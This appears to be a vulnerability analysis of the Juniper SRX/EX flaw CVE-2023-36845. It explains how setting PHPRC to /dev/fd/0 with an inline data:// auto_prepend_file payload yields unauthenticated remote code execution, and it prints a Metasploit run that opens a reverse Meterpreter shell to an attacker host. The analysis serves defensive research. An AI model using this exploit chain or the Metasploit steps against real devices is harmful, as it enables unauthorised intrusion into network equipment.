Activity Feed
Technical Analysis
This might be the most impactful CVSSv3 5.3 rated vulnerability you’ve ever (or never) heard about. The vulnerability affects Juniper’s SRX Firewalls and EX Switches and allows unauthenticated attackers to change environment variables resulting in remote code execution as the nobody
user. I’m going to briefly go over the evolution of the research of this vulnerability as I found it interesting.
CVE-2023-36844 + CVE-2023-36845
The Juniper advisory was first analyzed by Sonny at watchtowr and they wrote a great blog outlining how they used this vulnerability along with CVE-2023-36844 in order to obtain RCE. CVE-2023-36844 is an arbitrary file upload function that exploits the do_upload
function within the affected device. So what Sonny did was:
Use CVE-2023-36844 to upload a PHP file containing our shellcode
Use CVE-2023-36844 again to upload a second file, containing an auto_prepend_file directive instructing the PHP preprocessor to execute the file we uploaded in step 1
Use bug CVE-2023-36845 to set the PHPRC variable to the file we uploaded in step 2.
Just CVE-2023-36845
Using the clever research published by Sonny, Jacob Baines from Vuln Check posted a blog outlining how RCE can be obtained solely using CVE-2023-36845.
The affected Juniper devices use Appweb web server and when Appweb invokes a CGI script it passes arguments and environment variables in order for the script to access the users’s HTTP request. The body of the HTTP request is passed using stdin. Jacob noted that every FreeBSD process has access to their stdin by opening /dev/fd/0
. So by sending an HTTP request, an attacker is able to introduce a “file”, /dev/fd/0
to the system.
So if the attacker set’s PHPRC
equal to /dev/fd/0
and then uses the PHP function auto_prepend_file
which causes the provided file to be added using the require
function, in combination with allow_url_include
which allows the use of URL-aware fopen
wrappers. The attacker can then set auto_prepend_file
equal to data://<payload_goes_here>
so that the payload is provided inline and gets executed without ever being written to disk. Very cool.
Try this at home
There’s a great metasploit module available for this that can be found here and can be run like so:
msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set rhosts 192.168.0.247 rhosts => 192.168.0.247 msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set lhost 192.168.0.77 lhost => 192.168.0.77 msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > run [*] Started reverse TCP handler on 192.168.0.77:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable. [*] Sending stage (39927 bytes) to 192.168.0.247 [*] Meterpreter session 4 opened (192.168.0.77:4444 -> 192.168.0.247:58995) at 2023-09-20 16:27:04 -0400 meterpreter > getuid Server username: nobody meterpreter > sysinfoi [-] Unknown command: sysinfoi meterpreter > sysinfo Computer : JUNOS OS : FreeBSD JUNOS JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun 7 23:59:18 PDT 2020 builder@feyrith.juniper.net:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebsd/ Meterpreter : php/freebsd meterpreter >
References
https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/
https://vulncheck.com/blog/juniper-cve-2023-36845
- Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- Other: CISA Gov Alert (https://www.cisa.gov/news-events/alerts/2023/09/19/cisa-adds-one-known-exploited-vulnerability-catalog)
- Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- Other: CISA Gov Alert (https://www.cisa.gov/news-events/alerts/2023/09/18/cisa-adds-eight-known-exploited-vulnerabilities-catalog)
- Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- Other: CISA Gov Alert (https://www.cisa.gov/news-events/alerts/2023/09/18/cisa-adds-eight-known-exploited-vulnerabilities-catalog)
- Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- Other: CISA Gov Alert (https://www.cisa.gov/news-events/alerts/2023/09/18/cisa-adds-eight-known-exploited-vulnerabilities-catalog)
- Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- Other: CISA Gov Alert (https://www.cisa.gov/news-events/alerts/2023/09/18/cisa-adds-eight-known-exploited-vulnerabilities-catalog)
- Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- Other: CISA Gov Alert (https://www.cisa.gov/news-events/alerts/2023/09/18/cisa-adds-eight-known-exploited-vulnerabilities-catalog)
- Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- Other: CISA Gov Alert (https://www.cisa.gov/news-events/alerts/2023/09/18/cisa-adds-eight-known-exploited-vulnerabilities-catalog)
- Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- Other: CISA Gov Alert (https://www.cisa.gov/news-events/alerts/2023/09/18/cisa-adds-eight-known-exploited-vulnerabilities-catalog)
We did an assessment under another CVE from the report (kind of annoying that there are multiple CVEs): https://attackerkb.com/topics/1PKX0CCXkX/cve-2023-36844/rapid7-analysis?referrer=search
Jake’s added twist of not having to drop a PHP file is really cool!
I wish this (and the various blogs published) noted that you wind up in a super-restricted jail.. in my write-up, I did a bit of work on the jail, including outlining one way to escape